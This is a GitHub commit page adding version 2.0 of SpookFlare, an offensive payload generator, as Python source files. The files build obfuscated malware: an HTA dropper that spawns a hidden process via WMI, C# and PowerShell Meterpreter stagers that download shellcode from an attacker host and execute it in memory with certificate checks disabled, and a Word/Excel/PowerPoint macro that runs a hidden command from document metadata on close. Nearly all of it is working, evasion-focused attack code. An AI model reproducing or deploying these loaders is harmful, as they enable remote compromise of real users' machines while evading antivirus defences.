forked from hlldz/SpookFlare
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
SpookFlare v2.0. New payloads, new structure.
- Loading branch information
Showing
8 changed files
with
743 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,104 @@ | ||
# -*- coding: utf-8 -*- | ||
import random | ||
import string | ||
import base64 | ||
|
||
def randomString(): | ||
return ''.join([random.choice(string.ascii_letters) for n in xrange(12)]) | ||
|
||
def generateKey(): | ||
keys = "!#+%&/()=?_-*[]$><" | ||
return ''.join(random.sample(keys,len(keys))) | ||
|
||
def generateBase(htaCommand, htaFileName): | ||
htaKey = generateKey() | ||
if "\"" in htaCommand: | ||
htaPayload = htaKey.join([htaCommand[i:i+1] for i in range(0, len(htaCommand), 1)]).replace("\"", "\"\"") | ||
else: | ||
htaPayload = htaKey.join([htaCommand[i:i+1] for i in range(0, len(htaCommand), 1)]) | ||
|
||
baseHta = '''<script language="VBScript"> | ||
Sub window_onload | ||
Set {0} = CreateObject("WbemScripting.SWbemLocator") | ||
Set {1} = {0}.ConnectServer() | ||
{1}.Security_.ImpersonationLevel=3 | ||
Set {2} = {1}.Get("Win32_ProcessStartup") | ||
Set {3} = {2}.SpawnInstance_ | ||
{3}.ShowWindow = 12 | ||
Set {4} = {1}.Get("Win32_Process") | ||
{6} = {4}.Create(Replace("'''+htaPayload+'''", "'''+htaKey+'''", ""), NULL, {3}, {5}) | ||
window.close() | ||
End Sub | ||
</script>''' | ||
|
||
launcherBase = '''<html><head><script type="text/javascript">var {0} = atob("'''+base64.b64encode(baseHta.format(randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString()))+'''");var {1} = "'''+htaFileName+'''.hta";var {2} = new Blob([{0}], {{type: 'plain/text;charset=utf-8;'}});var {3} = null;if (navigator.msSaveBlob) {{{3} = navigator.msSaveBlob({2}, {1});}} else {{{3} = window.URL.createObjectURL({2});}}var {4} = document.createElement('a');{4}.href = {3};{4}.setAttribute('download', {1});document.body.appendChild({4});{4}.click();document.body.removeChild({4});</script></head></body></html>''' | ||
launcherFinal = launcherBase.format(randomString(), randomString(), randomString(), randomString(), randomString()) | ||
return launcherFinal | ||
cdata = " " | ||
def obfuscateHta(launcherFinal): | ||
finalPayload = "<html><body><head><script type=\"text/javascript\">var {0}=new Array;" | ||
stcData = [] | ||
i = 0 | ||
cdata = " " | ||
while i < len(list(launcherFinal)): | ||
stringToChar = ord(list(list(launcherFinal))[i]) | ||
i+=1 | ||
if i != len(list(launcherFinal)) - 0: | ||
stcData.append(str(stringToChar)) | ||
else: | ||
stcData.append(str(stringToChar)) | ||
deep = len(stcData) | ||
if deep % 4 == 0: | ||
i = 0 | ||
x = -1 | ||
while i < deep: | ||
code = (int(stcData[i]) * 256 + int(stcData[i+1])) | ||
code =+ ((code * 256 ** 2) / 256 + int(stcData[i+2])) | ||
code =+ ((code * 256 ** 3) / 256 ** 2 + int(stcData[i+3])) | ||
i += 4 | ||
x +=1 | ||
finalPayload += "{0}["+ str(x) + "]=" + str(code) + ";" | ||
elif deep % 4 == 3: | ||
cdata = stcData [deep - 3:deep] | ||
ndata = stcData [0:deep - 3] | ||
i = 0 | ||
x = -1 | ||
while i < deep - 3: | ||
code = (int(ndata[i]) * 256 + int(ndata[i+1])) | ||
code =+ ((code * 256 ** 2) / 256 + int(ndata[i+2])) | ||
code =+ ((code * 256 ** 3) / 256 ** 2 + int(ndata[i+3])) | ||
i += 4 | ||
x +=1 | ||
finalPayload += "{0}["+ str(x) + "]=" + str(code) + ";" | ||
ccode = (int(cdata[0]) * 256 + int(cdata[1])) | ||
ccode =+ ((ccode * 256 ** 2) / 256 + int(cdata[2])) | ||
finalPayload += "{0}["+ str(x + 1) + "]=" + str(ccode) + ";" | ||
elif deep % 4 == 2: | ||
cdata = stcData [deep - 2:deep] | ||
ndata = stcData [0:deep - 2] | ||
i = 0 | ||
x = -1 | ||
while i < deep - 2: | ||
code = (int(ndata[i]) * 256 + int(ndata[i+1])) | ||
code =+ ((code * 256 ** 2) / 256 + int(ndata[i+2])) | ||
code =+ ((code * 256 ** 3) / 256 ** 2 + int(ndata[i+3])) | ||
i += 4 | ||
x +=1 | ||
finalPayload +="{0}["+ str(x) + "]=" + str(code) + ";" | ||
ccode = (int(cdata[0]) * 256 + int(cdata[1])) | ||
finalPayload +="{0}["+ str(x + 1) + "]=" + str(ccode) + ";" | ||
elif deep % 4 == 1: | ||
cdata = stcData [deep - 1:deep] | ||
ndata = stcData [0:deep - 1] | ||
i = 0 | ||
x = -1 | ||
while i < deep - 1: | ||
code = (int(ndata[i]) * 256 + int(ndata[i+1])) | ||
code =+ ((code * 256 ** 2) / 256 + int(ndata[i+2])) | ||
code =+ ((code * 256 ** 3) / 256 ** 2 + int(ndata[i+3])) | ||
i += 4 | ||
x +=1 | ||
finalPayload +="{0}["+ str(x) + "]=" + str(code) + ";" | ||
|
||
finalPayload +="var {1}=\"\";for(i=0;i<{0}.length;i++){2}={0}[i],Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3)))),{2}-=Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3))*Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,3),Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2)))),{2}-=Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2))*Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,2),Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1)))),{2}-=Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1))*Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,1),Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,0))>0&&({1}+=String.fromCharCode(Math.floor({2}/Math.pow((2*(19+(89-(24*2)+(13*37)+37+(2*2))-10)/4)-(((6*5)*65)/30)+35,0))));document.write({1});</script></head></body></html>" | ||
return finalPayload.format(randomString(), randomString(), randomString()) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,41 @@ | ||
# -*- coding: utf-8 -*- | ||
import random | ||
import string | ||
import base64 | ||
from base64 import b64encode | ||
|
||
def randomString(): | ||
return ''.join([random.choice(string.ascii_letters) for n in xrange(12)]) | ||
|
||
def checksum8(s): | ||
return sum([ord(ch) for ch in s]) % 0x100 | ||
|
||
def genHTTPChecksum(): | ||
chk = string.ascii_letters + string.digits | ||
for x in xrange(64): | ||
uri = "".join(random.sample(chk,3)) | ||
r = "".join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random())) | ||
for char in r: | ||
if checksum8(uri + char) == 92: | ||
return uri + char | ||
|
||
def generateMPBinLoader(mpBinProto, mpBinLhost, mpBinLport, mpBinArch, mpBinSsize): | ||
|
||
if mpBinProto == "https": | ||
mpBinSSLChk = "ServicePointManager.ServerCertificateValidationCallback = (sender, cert, chain, sslPolicyErrors) => true;" | ||
else: | ||
mpBinSSLChk = "" | ||
|
||
if mpBinArch == "x86": | ||
mpBinArch = "UInt32" | ||
elif mpBinArch == "x64": | ||
mpBinArch = "UInt64" | ||
|
||
mpBinNSpace = randomString() | ||
mpBinLClass = randomString() | ||
loaderHost = mpBinProto+"://"+mpBinLhost+":"+mpBinLport+"/"+genHTTPChecksum() | ||
loaderBase = '''using System;using System.Net;using System.Runtime.InteropServices; namespace {24} {{ public class {25} {{ [DllImport ("kernel32")] private static extern {23} VirtualAlloc ({23} {0}, {23} {1}, {23} {2}, {23} {3}); [DllImport ("kernel32")] private static extern IntPtr CreateThread ({23} {4}, {23} {5}, {23} {6}, IntPtr {7}, {23} {8}, ref {23} {9}); [DllImport ("kernel32")] private static extern {23} WaitForSingleObject (IntPtr {10}, {23} {11}); [DllImport ("kernel32.dll")] static extern IntPtr GetConsoleWindow (); [DllImport ("user32.dll")] static extern bool ShowWindow (IntPtr {12}, int {13}); public static void Main () {{ShowWindow (GetConsoleWindow (), 0);{14}WebClient {15} = new System.Net.WebClient ();{15}.Headers.Add ("User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");{15}.Headers.Add ("Accept", "*/*");{15}.Headers.Add ("Accept-Language", "en-gb,en;q=0.5");byte[] {16} = null;{16} = {15}.DownloadData ("{26}");byte[] {17} = new byte[{16}.Length - {18}];Array.Copy ({16}, {18}, {17}, 0, {17}.Length);{23} {19} = VirtualAlloc (0, ({23}) {17}.Length, 0x1000, 0x40);Marshal.Copy ({17}, 0, (IntPtr) ({19}), {17}.Length);IntPtr {20} = IntPtr.Zero;{23} {21} = 0;IntPtr {22} = IntPtr.Zero;{20} = CreateThread (0, 0, {19}, {22}, 0, ref {21});WaitForSingleObject ({20}, 0xFFFFFFFF);}}}}}}'''.format(randomString(), randomString(), randomString(), randomString(),randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), mpBinSSLChk, randomString(), randomString(), randomString(), mpBinSsize, randomString(), randomString(), randomString(), randomString(), mpBinArch, mpBinNSpace, mpBinLClass, loaderHost) | ||
loaderKey = (''.join(random.sample("hlldzé!^+%&/()=?_<>£#$[]|",len("hlldzé!^+%&/()=?_<>£#$[]|")))[0:3]) | ||
loaderCode = loaderKey.join([loaderBase[i:i+1] for i in range(0, len(loaderBase), 1)]).replace("\"", "\\\"") | ||
loaderFinal = '''using System;using System.CodeDom.Compiler;using System.Reflection;using Microsoft.CSharp;namespace {0} {{public class {1} {{public static void Main () {{string {2} = "{3}".Replace("{4}", "");CSharpCodeProvider {5} = new CSharpCodeProvider ();CompilerParameters {6} = new CompilerParameters (new [] {{"mscorlib.dll", "System.dll"}});{6}.GenerateInMemory = true;{6}.ReferencedAssemblies.Add (Assembly.GetEntryAssembly ().Location);CompilerResults {7} = {5}.CompileAssemblyFromSource ({6}, {2});Assembly {8} = {7}.CompiledAssembly;Type {9} = {8}.GetType ("{10}.{11}");MethodInfo {12} = {9}.GetMethod ("Main");{12}.Invoke (null, null);}}}}}}'''.format(randomString(), randomString(), randomString(), loaderCode, loaderKey, randomString(), randomString(), randomString(), randomString(), randomString(), mpBinNSpace, mpBinLClass, randomString()) | ||
return loaderFinal |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,60 @@ | ||
# -*- coding: utf-8 -*- | ||
import random | ||
import string | ||
import base64 | ||
from base64 import b64encode | ||
|
||
def randomString(): | ||
return ''.join([random.choice(string.ascii_letters) for n in xrange(12)]) | ||
|
||
def checksum8(s): | ||
return sum([ord(ch) for ch in s]) % 0x100 | ||
|
||
def genHTTPChecksum(): | ||
chk = string.ascii_letters + string.digits | ||
for x in xrange(64): | ||
uri = "".join(random.sample(chk,3)) | ||
r = "".join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random())) | ||
for char in r: | ||
if checksum8(uri + char) == 92: | ||
return uri + char | ||
|
||
def generateMPPSLoader(mpProto, mpLhost, mpLport, mpArch, mpSsize): | ||
if mpArch == "x86": | ||
mpArch = "ToInt32" | ||
mpDef = "UInt32" | ||
elif mpArch == "x64": | ||
mpArch = "ToInt64" | ||
mpDef = "UInt64" | ||
|
||
loaderHost = mpProto+"://"+mpLhost+":"+mpLport+"/"+genHTTPChecksum() | ||
baseMetPs = '''${0} = @" | ||
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, {8} dwSize, {8} flAllocationType, {8} flProtect); | ||
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, {8} dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, {8} dwCreationFlags, IntPtr lpThreadId); | ||
[DllImport("kernel32.dll")] public static extern {8} WaitForSingleObject(IntPtr hHandle, {8} dwMilliseconds); | ||
"@; | ||
${1} = New-Object "`N`et.`W`ebc`l`i`ent";${1}.Headers.Add("User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");${1}.Headers.Add("Accept", "*/*");${1}.Headers.Add("Accept-Language", "en-gb,en;q=0.5");[Byte[]] ${2} = ${1}."D`o`wn`l`oa`d`Data"("{9}");${3} = New-Object byte[] (${2}.Length - {4});[Array]::Copy(${2}, {4}, ${3}, 0, (${2}.Length - {4}));${5} = A`d`d-T`y`p`e -memberDefinition ${0} -Name "Win32" -namespace `W`in`3`2`F`un`ct`i`on`s -passthru;${6}=${5}::VirtualAlloc(0,${3}.Length,0x3000,0x40);[Runtime.InteropServices.Marshal]::Copy(${3}, 0, [IntPtr](${6}.{7}()), ${3}.Length);${5}::CreateThread(0,0,${6},0,0,0) | oUT-NuLl;`S`T`A`R`T-`S`l`e`E`p -s `8`6`4`2`0''' | ||
|
||
loaderFinal = baseMetPs.format(randomString(), randomString(), randomString(), randomString(), mpSsize, randomString(), randomString(), mpArch, mpDef, loaderHost) | ||
return loaderFinal | ||
|
||
def generateMPPSCsharpLoader(mpPsCode): | ||
mCsharpCode = '''using System; | ||
using System.IO; using System.Diagnostics; using System.Reflection; using System.Runtime.InteropServices; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text; | ||
public class {0} {{ | ||
public static void Main() {{ | ||
byte[] {1} = Convert.FromBase64String("{6}"); | ||
string {2} = Encoding.Unicode.GetString({1}); | ||
{3} {3} = RunspaceFactory.CreateRunspace(); | ||
{3}.Open(); | ||
RunspaceInvoke {4} = new RunspaceInvoke({3}); | ||
{5} {5} = {3}.CreatePipeline(); | ||
{5}.Commands.AddScript({2}); | ||
{5}.Invoke(); | ||
{3}.Close(); | ||
return; | ||
}} | ||
}}''' | ||
|
||
loaderFinal = mCsharpCode.format(randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), b64encode(mpPsCode).encode("UTF-16LE")) | ||
return loaderFinal |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
# -*- coding: utf-8 -*- | ||
import random | ||
import string | ||
import base64 | ||
|
||
def randomString(): | ||
return ''.join([random.choice(string.ascii_letters) for n in xrange(12)]) | ||
|
||
def generateKey(): | ||
keys = "!#+%&/()=?_-*[]{}$><" | ||
return ''.join(random.sample(keys,len(keys))) | ||
|
||
def generateCmd(vbaKey, vbaCommand): | ||
return vbaKey.join([vbaCommand[i:i+1] for i in range(0, len(vbaCommand), 1)]) | ||
|
||
def generateVBALauncher(vbaFileType, vbaCommand, vbaMetaName): | ||
|
||
if vbaFileType == "word": | ||
vbaFileType = "ActiveDocument" | ||
elif vbaFileType == "excel": | ||
vbaFileType = "ActiveWorkbook" | ||
elif vbaFileType == "powerpoint": | ||
vbaFileType = "ActivePresentation" | ||
|
||
if vbaMetaName == "Comments": | ||
vbaMetaName = "C\"&\"o\"&\"m\"&\"m\"&\"e\"&\"n\"&\"t\"&\"s" | ||
elif vbaMetaName == "Company": | ||
vbaMetaName = "C\"&\"o\"&\"m\"&\"p\"&\"a\"&\"n\"&\"y" | ||
|
||
vbaCommandKey = generateKey() | ||
vbaBaseCmd = generateCmd(vbaCommandKey, vbaCommand) | ||
vbaBaseCode = '''Sub Auto_Close() | ||
{0} | ||
End Sub | ||
Sub AutoClose() | ||
{0} | ||
End Sub | ||
Public Function {0}() As Variant | ||
Dim {1} As DocumentProperty | ||
For Each {1} In {8}.BuiltInDocumentProperties | ||
If {1}.Name = "{10}" Then | ||
Dim {2} As String | ||
{2} = Replace({1}.Value, "{9}", "") | ||
Const HIDDEN_WINDOW = 0 | ||
Set {3} = GetObject("w"&"i"&"n"&"m"&"g"&"m"&"t"&"s"&":"&"\\"&"\\"&"."&"\\"&"r"&"o"&"o"&"t"&"\\"&"c"&"i"&"m"&"v"&"2") | ||
Set {4} = {3}.Get("W"&"i"&"n"&"3"&"2"&"_"&"P"&"r"&"o"&"c"&"e"&"s"&"s"&"S"&"t"&"a"&"r"&"t"&"u"&"p") | ||
Set {5} = {4}.SpawnInstance_ | ||
{5}.ShowWindow = HIDDEN_WINDOW | ||
Set {6} = GetObject("w"&"i"&"n"&"m"&"g"&"m"&"t"&"s"&":"&"\\"&"\\"&"."&"\\"&"r"&"o"&"o"&"t"&"\\"&"c"&"i"&"m"&"v"&"2"&":"&"W"&"i"&"n"&"3"&"2"&"_"&"P"&"r"&"o"&"c"&"e"&"s"&"s") | ||
{6}.Create {2}, Null, {5}, {7} | ||
End If | ||
Next | ||
End Function''' | ||
|
||
loaderFinal = "'\n'Insert the following string to \""+vbaMetaName.replace("\"&\"", "")+"\" meta data section of file:\n'" + vbaBaseCmd + "\n'\n\n" | ||
loaderFinal += vbaBaseCode.format(randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), vbaFileType, vbaCommandKey, vbaMetaName) | ||
return loaderFinal |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,3 @@ | ||
cmd | ||
terminaltables | ||
textwrap |
Oops, something went wrong.